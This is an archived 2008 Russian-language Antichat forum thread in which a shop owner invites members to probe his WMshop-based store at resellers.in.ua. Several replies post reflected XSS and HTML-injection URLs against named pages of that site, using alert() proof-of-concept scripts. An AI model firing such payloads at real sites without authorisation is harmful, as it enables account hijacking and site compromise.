Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   Прошу проверить resellers.in.ua (https://forum.antichat.xyz/showthread.php?t=65615)

roleg 27.03.2008 17:34

Прошу проверить resellers.in.ua
 
Прошу проверить скрипт интернет-магазина resellers.in.ua.
Сделан с легкой руки )) очень страшно с ним работать.
Подскажыте основные баги. Я не останусь в долгу.

P.S. Основа скрипта WMshop 13. Кнопка стоит внизу.

admin@resellers.in.ua

roleg 27.03.2008 21:17

Как писалось на многих форумах что WMshop самый дырявый скрипт среди магазинов... я уже месяц ищу доказательства такого предположения.
Да, в самом скрипте были найдены черные хода в админке и не указаны в документации права chmod на некоторые папки.
Хотелось бы узнать по больше про скрипт.

Piflit 27.03.2008 21:29

_настолько_ неясную капчу я еще не видел...

roleg 27.03.2008 21:59

Будет завтра TrueType с случайным поворотом, размещением, смещением в 3Д и случайной прозрачностью. Спасибо что напомнили +1
Почему неясная? Потому что скрипт только установил и загадил каптчу как мог )))))

Jokester 27.03.2008 22:34

_http://resellers.in.ua/buy_sort.php?com=>'><script>alert(11111111)</script>

xcedz 27.03.2008 22:48

http://resellers.in.ua/list_3.php?rid=24</SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>

roleg 27.03.2008 23:01

очень хорошо +
красивые Xss )))

roleg 28.03.2008 16:23

мало... может исходник выложыть?

desTiny 28.03.2008 17:23

пассивка
http://resellers.in.ua/seller.php?name=%3Cb%3Efff%3C/b%3E

Jokester 28.03.2008 19:03

_http://resellers.in.ua/buy.php?tovid=


Время: 11:36